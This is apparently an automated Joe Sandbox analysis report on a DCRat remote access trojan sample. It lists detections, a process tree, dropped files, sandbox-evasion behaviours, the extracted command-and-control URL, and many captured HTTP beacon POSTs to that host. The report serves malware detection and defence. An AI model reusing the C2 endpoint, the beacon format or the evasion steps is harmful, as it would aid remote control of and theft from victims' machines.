Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
A5EbyKyjhV.exe

Overview

General Information

Sample name:A5EbyKyjhV.exe
renamed because original name is a hash value
Original sample name:48B90C11912E9C7147D86C55D1E2CC94.exe
Analysis ID:1569209
MD5:48b90c11912e9c7147d86c55d1e2cc94
SHA1:ffc71fb727607913aa176c85f75972f1ac6fda7c
SHA256:bb0f507a87420a0597cdc40917ea1ba9c9576d3e750db3f9b66802b19550c9e7
Tags:DCRatexeuser-abuse_ch
Infos:

Detection

DCRat
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
.NET source code contains potential unpacker
.NET source code contains very large strings
AI detected suspicious sample
Drops executable to a common third party application directory
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Files With System Process Name In Unsuspected Locations
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • A5EbyKyjhV.exe (PID: 6356 cmdline: "C:\Users\user\Desktop\A5EbyKyjhV.exe" MD5: 48B90C11912E9C7147D86C55D1E2CC94)
    • cmd.exe (PID: 7288 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\kAhb7GGyxn.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 7340 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • PING.EXE (PID: 7356 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
      • DZNTXHJCUWXUTqOrRrGotfqdMP.exe (PID: 7528 cmdline: "C:\Program Files (x86)\windows sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe" MD5: 48B90C11912E9C7147D86C55D1E2CC94)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://121.127.37.30/TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
A5EbyKyjhV.exeJoeSecurity_DCRat_1Yara detected DCRatJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Recovery\RuntimeBroker.exeJoeSecurity_DCRat_1Yara detected DCRatJoe Security
      C:\Program Files (x86)\Reference Assemblies\DZNTXHJCUWXUTqOrRrGotfqdMP.exeJoeSecurity_DCRat_1Yara detected DCRatJoe Security
        C:\Program Files (x86)\Reference Assemblies\DZNTXHJCUWXUTqOrRrGotfqdMP.exeJoeSecurity_DCRat_1Yara detected DCRatJoe Security
          C:\Program Files (x86)\Reference Assemblies\DZNTXHJCUWXUTqOrRrGotfqdMP.exeJoeSecurity_DCRat_1Yara detected DCRatJoe Security
            C:\Program Files (x86)\Reference Assemblies\DZNTXHJCUWXUTqOrRrGotfqdMP.exeJoeSecurity_DCRat_1Yara detected DCRatJoe Security

              Memory Dumps

              SourceRuleDescriptionAuthorStrings
              0000000C.00000002.2496136619.000000000319D000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                0000000C.00000002.2496136619.0000000002EB6000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                  00000000.00000000.1242745024.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                    Process Memory Space: A5EbyKyjhV.exe PID: 6356JoeSecurity_DCRat_1Yara detected DCRatJoe Security
                      Process Memory Space: DZNTXHJCUWXUTqOrRrGotfqdMP.exe PID: 7528JoeSecurity_DCRat_1Yara detected DCRatJoe Security

                        Unpacked PEs

                        SourceRuleDescriptionAuthorStrings
                        0.0.A5EbyKyjhV.exe.fc0000.0.unpackJoeSecurity_DCRat_1Yara detected DCRatJoe Security

                          Sigma Signatures

                          System Summary

                          barindex
                          Sigma detected: Files With System Process Name In Unsuspected Locations
                          Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\A5EbyKyjhV.exe, ProcessId: 6356, TargetFilename: C:\Recovery\RuntimeBroker.exe

                          Suricata Signatures

                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-05T16:02:21.596399+010020480951A Network Trojan was detected192.168.2.749724121.127.37.3080TCP

                          Joe Sandbox Signatures

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Antivirus / Scanner detection for submitted sample
                          Source: A5EbyKyjhV.exeAvira: detected
                          Antivirus detection for URL or domain
                          Source: http://121.127.37.30/TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.phpAvira URL Cloud: Label: malware
                          Antivirus detection for dropped file
                          Source: C:\Program Files (x86)\Reference Assemblies\DZNTXHJCUWXUTqOrRrGotfqdMP.exeAvira: detection malicious, Label: HEUR/AGEN.1309961
                          Source: C:\Program Files (x86)\Reference Assemblies\DZNTXHJCUWXUTqOrRrGotfqdMP.exeAvira: detection malicious, Label: HEUR/AGEN.1309961
                          Source: C:\Users\user\Desktop\HbVuFfcO.logAvira: detection malicious, Label: HEUR/AGEN.1362695
                          Source: C:\Program Files (x86)\Reference Assemblies\DZNTXHJCUWXUTqOrRrGotfqdMP.exeAvira: detection malicious, Label: HEUR/AGEN.1309961
                          Source: C:\Users\user\Desktop\OsAKJQVe.logAvira: detection malicious, Label: HEUR/AGEN.1362695
                          Source: C:\Recovery\RuntimeBroker.exeAvira: detection malicious, Label: HEUR/AGEN.1309961
                          Source: C:\Users\user\Desktop\PjdKZeCh.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                          Source: C:\Users\user\Desktop\SRkiCrbU.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                          Source: C:\Users\user\AppData\Local\Temp\kAhb7GGyxn.batAvira: detection malicious, Label: BAT/Delbat.C
                          Source: C:\Users\user\Desktop\PvGkFmYz.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                          Source: C:\Users\user\Desktop\EZjMkwXT.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                          Found malware configuration
                          Source: A5EbyKyjhV.exeMalware Configuration Extractor: DCRat {"C2 url": "http://121.127.37.30/TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic"}
                          Multi AV Scanner detection for dropped file
                          Source: C:\Program Files (x86)\Reference Assemblies\DZNTXHJCUWXUTqOrRrGotfqdMP.exeReversingLabs: Detection: 73%
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeReversingLabs: Detection: 73%
                          Source: C:\ProgramData\Adobe\DZNTXHJCUWXUTqOrRrGotfqdMP.exeReversingLabs: Detection: 73%
                          Source: C:\Recovery\RuntimeBroker.exeReversingLabs: Detection: 73%
                          Source: C:\Users\user\Desktop\DyXMTSsE.logReversingLabs: Detection: 20%
                          Source: C:\Users\user\Desktop\HLTcvXUr.logReversingLabs: Detection: 29%
                          Source: C:\Users\user\Desktop\JMBKMsmH.logReversingLabs: Detection: 25%
                          Source: C:\Users\user\Desktop\PjdKZeCh.logReversingLabs: Detection: 70%
                          Source: C:\Users\user\Desktop\PvGkFmYz.logReversingLabs: Detection: 70%
                          Source: C:\Users\user\Desktop\RunsezZZ.logReversingLabs: Detection: 37%
                          Source: C:\Users\user\Desktop\SHQSLHwr.logReversingLabs: Detection: 37%
                          Source: C:\Users\user\Desktop\SRkiCrbU.logReversingLabs: Detection: 25%
                          Source: C:\Users\user\Desktop\XMlAJXRO.logReversingLabs: Detection: 25%
                          Source: C:\Users\user\Desktop\ZPYieGWJ.logReversingLabs: Detection: 25%
                          Source: C:\Users\user\Desktop\ZeaApOeg.logReversingLabs: Detection: 25%
                          Source: C:\Users\user\Desktop\asIaZkme.logReversingLabs: Detection: 20%
                          Source: C:\Users\user\Desktop\cJayVGAz.logReversingLabs: Detection: 50%
                          Source: C:\Users\user\Desktop\ejzRghnX.logReversingLabs: Detection: 20%
                          Source: C:\Users\user\Desktop\gzRpdDAs.logReversingLabs: Detection: 20%
                          Source: C:\Users\user\Desktop\jxryOjbr.logReversingLabs: Detection: 20%
                          Source: C:\Users\user\Desktop\lPgyvanJ.logReversingLabs: Detection: 50%
                          Source: C:\Users\user\Desktop\lyZggEuH.logReversingLabs: Detection: 20%
                          Source: C:\Users\user\Desktop\mEXomrcz.logReversingLabs: Detection: 50%
                          Source: C:\Users\user\Desktop\pxmXXnNx.logReversingLabs: Detection: 25%
                          Source: C:\Users\user\Desktop\vRqeFZrR.logReversingLabs: Detection: 50%
                          Source: C:\Users\user\Desktop\zuoNrmbc.logReversingLabs: Detection: 29%
                          Source: C:\Windows\SysWOW64\InstallShield\DZNTXHJCUWXUTqOrRrGotfqdMP.exeReversingLabs: Detection: 73%
                          Multi AV Scanner detection for submitted file
                          Source: A5EbyKyjhV.exeReversingLabs: Detection: 73%
                          AI detected suspicious sample
                          Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                          Machine Learning detection for dropped file
                          Source: C:\Program Files (x86)\Reference Assemblies\DZNTXHJCUWXUTqOrRrGotfqdMP.exeJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\Reference Assemblies\DZNTXHJCUWXUTqOrRrGotfqdMP.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\Desktop\HbVuFfcO.logJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\Reference Assemblies\DZNTXHJCUWXUTqOrRrGotfqdMP.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\Desktop\OsAKJQVe.logJoe Sandbox ML: detected
                          Source: C:\Recovery\RuntimeBroker.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\Desktop\PjdKZeCh.logJoe Sandbox ML: detected
                          Source: C:\Users\user\Desktop\SRkiCrbU.logJoe Sandbox ML: detected
                          Source: C:\Users\user\Desktop\AlRNHzIf.logJoe Sandbox ML: detected
                          Source: C:\Users\user\Desktop\PvGkFmYz.logJoe Sandbox ML: detected
                          Source: C:\Users\user\Desktop\EZjMkwXT.logJoe Sandbox ML: detected
                          Machine Learning detection for sample
                          Source: A5EbyKyjhV.exeJoe Sandbox ML: detected
                          Sample uses string decryption to hide its real strings
                          Source: A5EbyKyjhV.exeString decryptor: ["YJA3d6v8xvCs88eLwJusvaJtkkSEC2GU9KRhDEOk4xpTzp5GSd5X7x97AQS2oq64pssyq6Hs5Ky8u035pLvi7sWMKTgwvW6N1vnH6HZVWNcx9BMKWXNc4Y77WgnWZV7i","2104bcd367706e0ff53dd22047373df283e1a1506cf43ea95190e46de8cfe9d4","0","","","5","2","WyIxIiwiIiwiNSJd","WyIiLCJXeUlpTENJaUxDSmlibFp6WWtFOVBTSmQiXQ=="]
                          Source: A5EbyKyjhV.exeString decryptor: [["http://121.127.37.30/TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/","VideorequestprocessServerprotectwindowsPublic"]]
                          Source: A5EbyKyjhV.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                          Source: A5EbyKyjhV.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile opened: C:\Users\userJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile opened: C:\Users\user\AppDataJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeCode function: 4x nop then jmp 00007FFAAC51C906h0_2_00007FFAAC51C6ED
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeCode function: 4x nop then jmp 00007FFAAC4FC906h12_2_00007FFAAC4FC6ED

                          Networking

                          barindex
                          Suricata IDS alerts for network traffic
                          Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49724 -> 121.127.37.30:80
                          Uses ping.exe to check the status of other devices and networks
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                          Source: Joe Sandbox ViewASN Name: RANATECHNET-AFRANATechnologiesKabulAF RANATECHNET-AFRANATechnologiesKabulAF
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 384Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 2564Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 1452Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 2560Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 2564Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 2564Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 1452Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 2564Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 2564Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 2564Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 2564Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 1436Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 2564Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 2564Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 2564Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 2564Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 1452Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 2564Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 2564Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 2564Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 2564Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 1452Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 2564Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 2564Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 2560Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 2564Expect: 100-continueConnection: Keep-Alive
